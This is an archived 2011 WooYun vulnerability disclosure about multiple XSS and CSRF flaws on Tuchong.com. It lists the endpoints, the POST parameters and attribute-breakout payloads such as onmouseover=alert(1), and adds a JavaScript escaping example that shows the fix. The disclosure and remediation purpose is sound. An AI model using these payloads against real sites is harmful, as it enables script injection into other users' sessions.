WooYun (WooYun.org) historical vulnerability search---http://wy.zone.ci/
WooYun Drops articles online--------http://drop.zone.ci/
2011-03-15: Details have been sent to the vendor and are awaiting the vendor's handling
2011-03-15: Vendor has confirmed; details disclosed to the vendor only
2011-03-25: Details disclosed to core white hats and relevant domain experts
2011-04-04: Details disclosed to regular white hats
2011-04-14: Details disclosed to intern white hats
2011-04-14: Details disclosed to the public
Tuchong.com has multiple XSS and CSRF vulnerabilities.
FOUND XSS: [ POST ] http://www.tuchong.com/upload/edit/ Parameters: 535408%5Btitle%5D='><input value=shit onmouseover=alert(1)><k v='&535408%5Btags%5D=adsfadfsasd&535408%5Bdescription%5D=asdfahiadfa& Action URL: http://space.tuchong.com/34855/photos/
FOUND XSS: [ POST ] http://space.tuchong.com/api/album/create/ Parameters: alb_title="><input value=shit onmouseover=alert(1)><k v="&alb_description=test& Action URL: http://www.tuchong.com/album/23209/
FOUND XSS: [ POST ] http://space.tuchong.com/api/reply/add/ Parameters: format=html&cmt_parent_id="><input value=shit onmouseover=alert(1)><k v="&cmt_content=shi&cmt_resource_id=34855&cmt_type=user& Action URL: http://space.tuchong.com/api/reply/add/
FOUND XSS: [ POST ] http://www.tuchong.com/api/reply/add/ Parameters: cmt_parent_id="><input value=shit onmouseover=alert(1)><k v="&format=html&cmt_type=album&cmt_content=fuck&from_type=album&anonymous=on&cmt_resource_id=23198&from_id=23198& Action URL: http://www.tuchong.com/api/reply/add/
Found Saved XSS: [ GET ] http://www.tuchong.com/album/23198/?style=thumbnail Parameters: alb_title="><input value=shit onmouseover=alert(1)><k v="&alb_description=test& Action URL: http://space.tuchong.com/api/album/create/
Found Saved XSS: [ GET ] http://space.tuchong.com/34855/albums/ Parameters: alb_title='><input value=shit onmouseover=alert(1)><k v='&alb_description=test& Action URL: http://space.tuchong.com/api/album/create/
Look at http://space.tuchong.com/34855/
I/O filter plz...
Severity: Medium
Vulnerability Rank: 5
Confirmed: 2011-03-15 11:11
We were careless during development and missed the filtering and escaping, which led to such a basic bug. Many thanks! We will fix it as soon as possible.
None yet
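As an added example (not from the report or from Tuchong), the fix the vendor's reply points to: escaping album titles for an HTML attribute context before reflecting them. The template shape is assumed; the two payload strings are copied from the findings above, and the unescaped rendering is kept beside the escaped one so the difference is visible.

```javascript
// Added example (not from the original report or from Tuchong): server-side
// HTML-attribute escaping that neutralizes the attribute-breakout payloads
// listed in the findings. The template shape is assumed.

// Escape the five characters that matter inside an HTML attribute value.
// Both quote styles are escaped because the report shows breakouts of
// single-quoted (') and double-quoted (") attributes.
function escapeHtmlAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hypothetical edit form: the stored title is reflected into a quoted
// attribute. `quote` selects the attribute's delimiter (" or ').
function renderTitleInput(title, quote = '"') {
  return `<input name="title" value=${quote}${escapeHtmlAttr(title)}${quote}>`;
}

// The same template without escaping: this is the defect the report describes.
function renderUnescaped(title, quote = '"') {
  return `<input name="title" value=${quote}${title}${quote}>`;
}

// Crude check on a rendered fragment: count the tags actually present.
// A correctly escaped reflection leaves exactly one <input ...> tag; the
// unescaped one yields three (the original input, the injected input, <k>).
function countTags(html) {
  return (html.match(/<[a-zA-Z][^>]*>/g) || []).length;
}

// Payloads as they appear in the report (double- and single-quote variants).
const PAYLOAD_DQ = '"><input value=shit onmouseover=alert(1)><k v="';
const PAYLOAD_SQ = "'><input value=shit onmouseover=alert(1)><k v='";

console.log(countTags(renderUnescaped(PAYLOAD_DQ)), renderUnescaped(PAYLOAD_DQ));
console.log(countTags(renderTitleInput(PAYLOAD_DQ)), renderTitleInput(PAYLOAD_DQ));
```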